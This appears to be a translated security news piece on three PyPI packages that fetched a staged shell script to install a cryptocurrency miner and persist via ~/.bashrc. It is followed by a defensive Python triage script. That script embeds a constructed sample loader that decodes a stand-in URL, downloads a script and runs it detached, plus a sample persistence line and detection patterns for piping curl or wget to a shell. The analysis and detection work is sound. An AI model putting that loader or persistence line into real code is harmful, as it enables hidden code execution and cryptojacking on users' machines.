Developers become victims: How hackers steal computing resources through PyPI

Brother

A planted infiltrator aimed at Linux systems. How soon will the victims of the attack notice that something is wrong?

Three malicious packages capable of deploying a cryptocurrency miner on infected Linux machines were recently discovered in the open Python Package Index (PyPI) repository. The packages, named "modularseven", "driftme" and "catme", drew the attention of security researchers after being downloaded 431 times in total during the month before they were removed from the index.

Gabby Xiong, a researcher at Fortinet, said that these packages deploy the CoinMiner executable on Linux devices the first time they are used.

The malicious code lives in the package's "__init__.py" file, which decodes and retrieves the first stage from a remote server: a shell script ("unmi.sh") that in turn downloads the mining configuration file and the CoinMiner executable hosted on GitLab.

The ELF binary is then executed in the background with the "nohup" command, which makes the process ignore the hangup signal so that it keeps running after the user's session exits.

Xiong notes that these packages, like the "culturestreak" package from an earlier, similar campaign, hide the payload by hosting it at a remote URL rather than shipping it inside the package, which reduces the chance that the malicious code is detected on the index. The payload is then fetched onto the victim's machine in stages to carry out the malicious activity.

The link to the earlier culturestreak package is also evident in the infrastructure: the configuration file is hosted on the papiculo[.]net domain, and the mining executables are hosted in a public GitLab repository.

One notable innovation in the three newly detected packages is an additional stage that conceals the malicious intent inside the shell script, which helps the payload evade antivirus detection.

In addition, Xiong points out that the malware inserts its commands into the user's "~/.bashrc" file, which gives it persistence: the miner is re-launched every time the user opens a new interactive shell, extending the period during which it operates unnoticed. The goal is to keep the compromised machine working for the attackers for as long as possible without being detected.
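Two checks a practitioner would run against the chain described above, as an added example (this is not Fortinet's tooling and not the malicious packages' own code): a static triage of a package's "__init__.py" for the decode-then-fetch-then-execute loader pattern, and an audit of "~/.bashrc" for the kind of line a dropper appends for persistence. The sample "__init__.py", the example.invalid URL, the "/tmp/unmi.sh" path and the ".bashrc" contents are constructed for illustration and are only scanned as text, never imported or executed.

```python
"""Static triage for the staged PyPI miner-dropper pattern.

Added example, not Fortinet's tooling or the malicious packages' code.
The sample __init__.py and ~/.bashrc below are constructed for
illustration (example.invalid is a reserved, non-resolving domain) and
are only scanned as text, never imported or executed.
"""
import re
from typing import Dict, List, Tuple

# Each indicator alone is common in benign code (base64 for embedded
# assets, urllib for update checks); the combination marks a loader.
LOADER_INDICATORS = {
    "decode": re.compile(r"\b(base64\.b64decode|codecs\.decode|zlib\.decompress)\b"),
    "fetch": re.compile(r"\b(urllib\.request\.urlopen|requests\.get|http\.client)\b"),
    "exec": re.compile(
        r"\b(os\.system|os\.popen|subprocess\.(Popen|run|call|check_output))\b"
        r"|\b(exec|eval)\("
    ),
    "detach": re.compile(r"\bnohup\b|\bsetsid\b|start_new_session\s*=\s*True"),
    "shell_script": re.compile(r"\.sh\b"),
}
CORE = {"decode", "fetch", "exec"}  # the decode -> fetch -> run chain


def scan_init(source: str) -> List[str]:
    """Names of loader indicators found in the source text, in table order."""
    return [name for name, rx in LOADER_INDICATORS.items() if rx.search(source)]


def triage_init(source: str) -> Dict[str, object]:
    """Classify an __init__.py: the full core chain is a staged loader,
    two of the three core steps deserve a manual look, anything less is clean."""
    hits = scan_init(source)
    present = CORE & set(hits)
    if present == CORE:
        verdict = "staged-loader"
    elif len(present) == 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict}


# Lines a dropper appends to ~/.bashrc so the miner restarts with every
# interactive shell. Comment and blank lines are skipped.
BASHRC_PATTERNS = {
    "remote_pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"),
    "detached_launch": re.compile(r"\bnohup\b|\bsetsid\b"),
    "hidden_path_background": re.compile(r"(/tmp/|/dev/shm/|~/\.|\$HOME/\.)\S+.*&\s*$"),
}


def audit_bashrc(text: str) -> List[Tuple[int, str, str]]:
    """(line number, indicator, line) for every suspicious non-comment line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, rx in BASHRC_PATTERNS.items():
            if rx.search(stripped):
                findings.append((no, name, stripped))
    return findings


# --- constructed samples (scanned as text only) ---------------------------
SAMPLE_INIT = r'''
import base64, os, urllib.request
_u = base64.b64decode("aHR0cDovL2V4YW1wbGUuaW52YWxpZC91bm1pLnNo").decode()
_s = urllib.request.urlopen(_u).read()                  # stage 1: shell script
open("/tmp/unmi.sh", "wb").write(_s)
os.system("nohup sh /tmp/unmi.sh >/dev/null 2>&1 &")   # run it detached
'''

BENIGN_INIT = '''
"""A normal package."""
from .core import helper
__all__ = ["helper"]
'''

SAMPLE_BASHRC = """\
# benign lines, then one appended by the dropper for persistence
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
nohup sh ~/.config/.x/unmi.sh >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    print("sample __init__.py:", triage_init(SAMPLE_INIT))
    print("benign __init__.py:", triage_init(BENIGN_INIT))
    for no, name, line in audit_bashrc(SAMPLE_BASHRC):
        print(f"~/.bashrc line {no}: {name}: {line}")
```

To sweep a real environment, feed every "*/__init__.py" under the interpreter's site-packages directory to triage_init and the contents of each user's .bashrc (and .profile, .zshrc) to audit_bashrc; a "staged-loader" verdict or a detached launch from a hidden directory is the signal to pull the package and look for a miner process that survived the session.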
 